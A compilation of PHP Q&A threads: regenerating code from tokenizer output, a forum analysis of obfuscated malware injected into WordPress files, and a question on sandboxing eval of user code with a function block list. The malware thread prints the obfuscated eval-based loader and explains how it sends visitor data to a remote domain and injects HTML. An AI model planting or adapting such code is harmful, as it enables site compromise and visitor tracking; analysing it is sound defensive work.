Generating PHP code (from Parser Tokens) - php

Is there any available solution for (re-)generating PHP code from the Parser Tokens returned by token_get_all? Other solutions for generating PHP code are welcome as well, preferably with the associated lexer/parser (if any).

From my comment:
Does anyone see a potential problem if I simply write a large switch statement to convert tokens back to their string representations (i.e. T_DO to 'do'), map that over the tokens, join with spaces, and look for some sort of PHP code pretty-printing
After some looking, I found a homemade PHP solution in this question that actually uses the PHP Tokenizer interface, as well as some PHP code formatting tools which are more configurable (but would require the solution as described above).
These could be used to quickly realize a solution. I'll post back here when I find some time to cook this up.
Solution with PHP_Beautifier
This is the quick solution I cooked up; I'll leave it here as part of the question. Note that it requires you to break open the PHP_Beautifier class by changing everything that is private to protected (probably not everything needs to change, but this is easier). Otherwise it is impossible to reuse the internal workings of PHP_Beautifier without reimplementing half of its code.
An example usage of the class would be:
file: main.php
// read some PHP code (the file itself will do)
$phpCode = file_get_contents(__FILE__);
// create a new instance of PHP2PHP
$php2php = new PHP2PHP();
// tokenize the code (forwards to token_get_all)
$phpCode = $php2php->php2token($phpCode);
// print the tokens, in some way
echo join(' ', array_map(function($token) {
    return (is_array($token))
        ? (($token[0] === T_WHITESPACE)
            ? (($token[1] === "\n")
                ? "\n"
                : '')
            : token_name($token[0]))
        : $token;
}, $phpCode));
// transform the tokens back into legible PHP code
$phpCode = $php2php->token2php($phpCode);
As PHP2PHP extends PHP_Beautifier, it allows for the same fine-tuning under the same API that PHP_Beautifier uses. The class itself is:
file: PHP2PHP.php
class PHP2PHP extends PHP_Beautifier {
    function php2token($phpCode) {
        return token_get_all($phpCode);
    }

    function token2php(array $phpToken) {
        // prepare properties
        $this->aTokens = $phpToken;
        $iTotal = count($this->aTokens);
        $iPrevAssoc = false;
        // send a signal to the filter, announcing the init of the processing of a file
        foreach($this->aFilters as $oFilter) {
            $oFilter->preProcess(); // assumed: mirrors PHP_Beautifier::process()
        }
        for ($this->iCount = 0;
                $this->iCount < $iTotal;
                $this->iCount++) {
            $aCurrentToken = $this->aTokens[$this->iCount];
            // normalize single-character tokens to the array form
            if (is_string($aCurrentToken)) {
                $aCurrentToken = array(
                    0 => $aCurrentToken,
                    1 => $aCurrentToken
                );
            }
            // ArrayNested->off();
            $sTextLog = PHP_Beautifier_Common::wsToString($aCurrentToken[1]);
            // ArrayNested->on();
            $sTokenName = (is_numeric($aCurrentToken[0])) ? token_name($aCurrentToken[0]) : '';
            $this->oLog->log("Token:" . $sTokenName . "[" . $sTextLog . "]", PEAR_LOG_DEBUG);
            $iFirstOut = count($this->aOut); //5
            $bError = false;
            $this->aCurrentToken = $aCurrentToken;
            if ($this->bBeautify) {
                foreach($this->aFilters as $oFilter) {
                    $bError = true;
                    if ($oFilter->handleToken($this->aCurrentToken) !== FALSE) {
                        $this->oLog->log('Filter:' . $oFilter->getName() , PEAR_LOG_DEBUG);
                        $bError = false;
                        break; // assumed: the first filter that handles the token wins
                    }
                }
            } else {
                $this->add($aCurrentToken[1]); // assumed: pass the token text through unchanged
            }
            $iLastOut = count($this->aOut);
            // set the assoc
            if (($iLastOut-$iFirstOut) > 0) {
                $this->aAssocs[$this->iCount] = array(
                    'offset' => $iFirstOut
                );
                if ($iPrevAssoc !== FALSE) {
                    $this->aAssocs[$iPrevAssoc]['length'] = $iFirstOut-$this->aAssocs[$iPrevAssoc]['offset'];
                }
                $iPrevAssoc = $this->iCount;
            }
            if ($bError) {
                // var_export(..., true) returns the dump as a string; var_dump() would print it and return null
                throw new Exception("Can't process token: " . var_export($aCurrentToken, true));
            }
        } // ~for
        // generate the last assoc
        if (count($this->aOut) == 0) {
            throw new Exception("Nothing on output!");
        }
        $this->aAssocs[$iPrevAssoc]['length'] = (count($this->aOut) -1) - $this->aAssocs[$iPrevAssoc]['offset'];
        // post-processing
        foreach($this->aFilters as $oFilter) {
            $oFilter->postProcess(); // assumed: mirrors PHP_Beautifier::process()
        }
        return $this->get();
    }
}
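As a point of comparison for the switch-statement idea: every token returned by token_get_all() already carries its original text (array tokens in index 1, single-character tokens as plain strings), so a lossless round trip does not need a lookup table. A minimal sketch, where tokensToSource is a hypothetical helper name and not part of PHP_Beautifier:

```php
<?php
// Hypothetical helper: concatenate the text of every token back into source code.
function tokensToSource(array $tokens): string
{
    $out = '';
    foreach ($tokens as $token) {
        // Array tokens are [id, text, line]; single-character tokens are plain strings.
        $out .= is_array($token) ? $token[1] : $token;
    }
    return $out;
}

$source = "<?php\nif (\$a) { echo 'hi'; }\n";
$tokens = token_get_all($source);
var_dump(tokensToSource($tokens) === $source); // bool(true)
```

This only reproduces the input. Once tokens are added, removed, or reordered, whitespace has to be regenerated, which is where a formatter such as PHP_Beautifier comes in.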

In the category of "other solutions", you could try PHP Parser.
The parser turns PHP source code into an abstract syntax tree....Additionally, you can convert a syntax tree back to PHP code.

If I'm not mistaken uses token_get_all() and then rewrites the stream. It uses heaps of methods like t_else and t_close_brace to output each token. Maybe you can hijack this for simplicity.

See our PHP Front End. It is a full PHP parser, automatically building ASTs, and a matching prettyprinter that regenerates compilable PHP code complete with the original comments. (EDIT 12/2011:
See this SO answer for more details on what it takes to prettyprint from ASTs, which are just an organized version of the tokens.)
The front end is built on top of our DMS Software Reengineering Toolkit, enabling the analysis and transformation of PHP ASTs (and then, via the prettyprinter, code).


Malicious code found in WordPress theme files. What does it do?

I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it?
<?php if (!isset($GLOBALS["anuna"])) {
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1;
} ?>
<?php $nzujvbbqez = 'E{h%x5c%x7825)j{hnpd!opjudovg-%x5c%x7824]26%x5c%x7824-%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<x5c%x782f#)rrd%x5c%x83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y<X>b%x5c%x7825Z<#opo#>b{jt)!gj!<*2bd%x5c%x7euhA)3of>2bd%x5c%x7825!<5h%x5c%x78225%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tus66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5cc%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878284]364]6]234]342]58]24]311]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#73]y72]282#<!%x5c%x7825tjw!>!x5c%x7825%x5c%x787f!25ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd8;0]=])0#)U!%x5c%x7827{**u%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7.3%x5c%x7860hA%x5c%x7827pd%x5c%x782525)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x55%x5c%x782f#0#%x5c%x782f*#npd%}#-#%x5c%x7824-%x5c%x7824-tusvd},;uqpuft%x5c%x7860>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyf5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5tcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x786<.fmjgA%x5c%x7827doj%x825-#jt0}Z;0]=]0#)2q%x5c%xx5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78ec%x7825!**X)ufttj%x5c%x7822)r.985:52985-t.98]K4]65]D8]86]y37827pd%x5c%x78256<pd%x5c%x7825w6Z6<]5]48]32M3]317]445]212]445]43]321]464]
n)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782so!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5cW~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2%x5c%x78b%x5c%x7825w:!>!%x5c27;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%xufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:5cq%x5c%x78257**^#zsfvr#27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSc%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%xc%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id1%x29%73", NULL); }IjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuv5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7ec%x787f%x5c%x787f%x5c%x787f%x5%x5c%x7825)ftpmdR6<*id%x5c%x78mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#7825l}S;2-u%x5c%x7825!-#2#%**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<]y74]256]y39]252]y83]2761"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; funx5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)%x7825zB%x5c%x7825z>!tussfw)%x5c%xu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c165%x3a%146%x21%76%x21%50%x5cction fjfgg($n){return 
78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x76]277]y72]265]y39]271]y83]256]y78]248]y827!hmg%x5c%x7825!)!gj!<2,*qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824doF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x561%154%x28%151%x6d%160%x6c%157%x6%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x785j:.2^,%x5c%x7825b:<!%x5c%x<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x78*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x78787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x57###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x7x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5ce:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%k;opjudovg}%x5c%x7877825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x77825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j25!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x7825!*##>>X)!gjZ<#opo#>b%x533]65]y31]53]y6d]281]y43825<#762]67y]562]38y]572]48y]j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubx7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboep5h>#]y31]278]y3e]81]K78:56985:6197g:74787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822o]#%x5c%x782f*)323zbe!-#jt0*?]+^782f#00;quui#>.%x5c%x7825!<***f%x5c%x7946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQc%x7825}K;%x5c%x7860ufldpt}X;%x5c%x
7860msvd}R;*msv5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{25)Rb%x5c%x7825))!gj!<*#cd1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%xj!|!*msv%x5c%x7825)}k~~~<ftm4-%x5c%x7824y7%x5c%x7824-%x5ce%x5c%x7825!osvufs!*!+A!>!{e%x5x7825)uqpuft%x5c%x7860msc%x7825>U<#16,47R57,27R]K5]53]Kc#<%x5c%x7825tp&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!x7825!<**3-j%x5c%x78%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3x5c%x782f#%x5c%x7825#%x5c%x782f#mqnj!%x5c%x782f!#0#)idubn%x5c#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c#-%x5c%x7825tdz*Wsfuvso!%x5c%78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273fttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%xf!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;60%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xc%x787f<u%x5c%x7825Vif((function_exists("%x6f%142%x5f%163%x74%141%x7%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%xz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4x5c%x78257>%x5c%x782f7&6|7**11x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5 
c%x7825c5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825)dfyfR%x5c%x7827tfs%x54%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*#)tutjyf%x5c%x7860opjudovg)!gE#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]%x5c%x785cq%x5c%x7825)uoe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x!>!tus%x5c%x7860sfqmbdf)%x5c%4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x6<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yq%x5c%x7825V<*#fopoV;hojepmsvd}+;!>!}%x5c%x7827;!4%145%x28%141%x72%162%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x78827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%xov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x77825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x78]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqchr(ord($n)-1);} 
#erro%x7824*<!%x5c%x7824-2bge56+99386c6f+9f5d816:+25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x782mpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3825!*72!%x5c%x7827!hmg%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x782[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-d]51]y35]256]y76]72]y3d]51]y35]274]yeobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!*#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<bg!osvufs!|ftmf!~<**9.-j%x5c5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7dx7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5**b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7sfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x7825bss%x5c%x785csbhpph#)zbssb!-#}#)fep:~:<*9-1-r%x5c%x7825)825,3,j%x5c%x7825>j%x5c%82f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmc%x78786<C%x5c%x7827&6<*rfs%x5c1127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5%x7825-bubE{h%x5c%x7825)su34]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)25-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%xx7827)fepdof.)fepdof.%x5c%x782f###%V,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%xr_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%166%xy76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osv2%164") && (!isset($GLOBALS["%x61%156%x75%156%xu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%8257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%5c%x7825)fnbozcYufhA%x5c%x78272qj%x/(.*)/epreg_replacestvbowvmjj';
$uskbxljsbs = explode(chr((169 - 125)), '6393,48,9851,47,2858,50,3117,23,8291,22,9595,68,3457,33,7412,23,3914,63,6775,52,3088,29,1791,56,2150,28,6441,66,3140,43,1906,35,926,36,7276,35,2578,51,2993,59,275,45,6613,30,9241,42,9210,31,886,40,9989,41,5417,69,4931,62,1312,54,534,47,483,51,7223,53,10071,35,6190,50,3811,39,6142,48,2353,24,7062,23,6048,57,1266,46,3977,58,8168,55,1633,23,5272,63,2455,47,2659,30,6751,24,6827,38,2377,38,9554,41,3706,63,5644,70,4249,67,5105,50,4787,40,5574,24,1087,21,7389,23,1108,60,6277,47,6865,29,5486,28,8828,28,9283,26,1366,61,3223,27,6949,50,8506,23,3850,64,1739,52,9128,24,5714,20,9449,70,7435,62,8131,37,4653,70,0,29,4316,56,3572,68,4528,39,180,20,9379,70,200,35,1028,30,92,20,5025,38,7567,50,9519,35,2908,51,8672,58,8986,47,9152,58,9087,20,5879,29,3769,42,8029,45,5391,26,8333,25,5063,42,5203,69,9718,65,726,20,157,23,4567,33,1847,28,1212,54,9898,51,3640,66,6324,49,5155,48,61,31,9783,68,2271,36,815,38,7717,69,2793,42,5335,56,5543,31,3399,58,2629,30,6373,20,4372,65,8925,61,5598,23,362,57,7363,26,3353,46,3052,36,1581,52,2178,48,4180,20,853,33,1656,26,2766,27,5847,32,4993,32,1168,44,9663,55,2835,23,698,28,5908,51,6999,63,1530,51,419,64,9107,21,7617,37,7497,70,962,66,2415,40,4437,51,7786,70,4624,29,8730,39,8358,50,5988,60,8074,57,6105,37,4723,64,1682,57,1489,41,1058,29,3250,41,7155,29,3291,62,29,32,8408,59,5514,29,8313,20,3490,55,235,40,8223,68,8467,39,8636,36,7184,39,320,42,9033,34,6643,67,2521,57,2026,60,2959,34,7856,64,6240,37,4200,49,4827,66,1979,47,4893,38,581,48,1875,31,655,43,4035,53,5621,23,6507,46,6553,60,8769,59,7654,63,7920,49,8593,43,5734,68,5802,45,9309,70,1941,38,629,26,5959,29,9067,20,7085,70,9949,40,4088,56,10030,41,4144,36,8529,64,3545,27,4488,40,2307,46,2086,64,1427,62,6710,41,746,69,2689,20,2709,57,6894,55,2226,45,8856,26,8882,43,7311,52,3183,40,112,45,4600,24,7969,60,2502,19');
$aemhtmvyge = substr($nzujvbbqez, (69491 - 59385), (44 - 37));
if (!function_exists('hperlerwfe')) {
function hperlerwfe($opchjywcur, $oguxphvfkm) {
$frnepusuoj = NULL;
for ($yjjpfgynkv = 0;$yjjpfgynkv < (sizeof($opchjywcur) / 2);$yjjpfgynkv++) {
$frnepusuoj.= substr($oguxphvfkm, $opchjywcur[($yjjpfgynkv * 2) ], $opchjywcur[($yjjpfgynkv * 2) + 1]);
return $frnepusuoj;
$rfmxgmmowh = " /* orpuzttrsp */ eval(str_replace(chr((230-193)), chr((534-442)), hperlerwfe($uskbxljsbs,$nzujvbbqez))); /* unvtjodgmt */ ";
$yiffimogfj = substr($nzujvbbqez, (60342 - 50229), (38 - 26));
$yiffimogfj($aemhtmvyge, $rfmxgmmowh, NULL);
$yiffimogfj = $rfmxgmmowh;
$yiffimogfj = (470 - 349);
$nzujvbbqez = $yiffimogfj - 1; ?>
After digging through the obfuscated code and untangling a number of preg_replace, eval and create_function statements, this is my attempt at explaining what the code does:
The code will start output buffering and register a callback function triggered at the end of buffering, e.g. when the output is to be sent to the web server.
First, the callback function will attempt to uncompress the output buffer contents if necessary using gzinflate, gzuncompress, gzdecode or a custom gzinflate based decoder (I have not dug any deeper into this).
With the contents uncompressed, a request will be made containing the $_SERVER values of
... to the domain given by chars 0-8 or 8-15 (randomly picks one or the other) in an md5 hash of the IPv4 address of "" appended with ".com", currently giving md5(".com" . <IPv4> ) => md5(".com8.8.8.8") => "" / "".
The request will be attempted using file_get_contents, curl_exec, file and finally socket_write.
Note that no request will be made if:
any of the HTTP_USER_AGENT, REMOTE_ADDR or HTTP_HOST is empty/not set
PHP_SELF contains the word "admin"
HTTP_USER_AGENT contains any of the words "google", "slurp", "msnbot", "ia_archiver", "yandex" or "rambler".
Secondly, if the output buffer contents has a body or html tag, and the response from the request above (decoded using en2() function below) contains at least one "!NF0" string, the content between the first and second "!NF0" (or end of string) will be injected into the HTML page at the beginning of the body or in case there is no body tag, the html tag.
The code used for encoding/decoding traffic is this one:
function en2($s, $q) {
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g . $q . "q1w2e3r4"));
        $g .= substr($q, 0, 8);
    }
    return $s ^ $g;
}
$s is the string to encode/decode and $q is a random number between 100000 and 999999 acting as a key.
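Because en2() only XORs the input with a keystream derived from $q, applying it twice with the same key returns the original string, which is how captured traffic can be decoded. A minimal sketch of that round trip; the function body repeats the one above, and the sample string and key are made up for illustration:

```php
<?php
// Same keystream-XOR routine as described above.
function en2($s, $q) {
    $g = "";
    // Extend the keystream 8 bytes at a time until it covers the input.
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g . $q . "q1w2e3r4"));
        $g .= substr($q, 0, 8);
    }
    // String XOR is byte-wise and stops at the shorter operand.
    return $s ^ $g;
}

$key = 123456;                           // hypothetical key in the 100000-999999 range
$plain = "Mozilla/5.0 (example agent)";  // hypothetical input
$encoded = en2($plain, $key);
var_dump(en2($encoded, $key) === $plain); // bool(true)
```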
The request URL mentioned above is calculated like this:
$url = "http:// ... /"
    . $op // Random number/key
    . "?"
    . urlencode(
        base64_encode(en2( $http_user_agent, $op)) . "." .
        base64_encode(en2( $http_referrer, $op)) . "." .
        base64_encode(en2( $remote_addr, $op)) . "." .
        base64_encode(en2( $http_host, $op)) . "." .
        base64_encode(en2( $php_self, $op))
    );
I have not found any sign of what initially placed the malicious code on your server, nor of it doing anything other than allowing bad HTML/JavaScript code to be injected into your web pages. That does not mean that nothing else is still there.
You really should do a clean install, as suggested by @Bulk above:
The only way you'll ever know for sure it's been cleaned is to re-install absolutely everything you can from scratch - i.e. fresh WordPress install, fresh plugin install. Then literally comb every line of your theme for anything out of the ordinary. Also of note, they often will put things in wp-content/uploads that look like images but aren't - check those too.
Pastebin here.

How can this user code input procedure be exploited?

I'm trying to come up with a way that a user can input code fragments that will be able to run both server-side and client-side. In an ideal world, I'd have a Lua interpreter or a JavaScript engine on the server which I could call out to, but I don't see either of those as an easy solution (to set up on my dev machine OR to find a host that will do it).
I've got an idea of allowing the user to write a code snippet to run in Javascript, then translate it to be used in PHP.
The usage is for the user to write the internals of a function call which does various things. A (very) simple example would be to give the user a function that takes the parameter 'amount', and they could write a string like amount * 1.05 (which then translates to function(amount) { return amount * 1.05; } in JavaScript, or function($amount) { return $amount * 1.05; } in PHP). A more complicated example would be (speed < 9) ? Math.pow(speed, (10 / 3)) : Math.pow(speed, (10 / 3) + (-0.5 * Math.log(10 - speed) / Math.log(10))). For protection on the PHP side, only recognized variable names (the function parameters, such as amount or speed in the two prior examples) have a $ placed on them, and certain known JavaScript library calls or functions like Math are/will be translated (in the case of Math, all of the JavaScript functions are directly compatible with PHP, so we just strip "Math."). The PHP code would then be run through something like $func = eval(Pseudocode::generatePhpCode($code)); to get the server-side function.
My question is - despite my attempts to LIMIT what can be run, could this be exploited somehow? What improvements can I make?
static function generatePhpCode($pseudocode, $parameterList)
{
    // Make a list of things that are not allowed in the "pseudocode"
    $illegal = ['$', '#', '->', '::', '`', 'exec', 'eval', 'system', 'passthru', 'popen', 'pclose', 'fopen', 'fclose', 'proc_', 'select', 'shell', 'sql', 'ini', 'echo'];
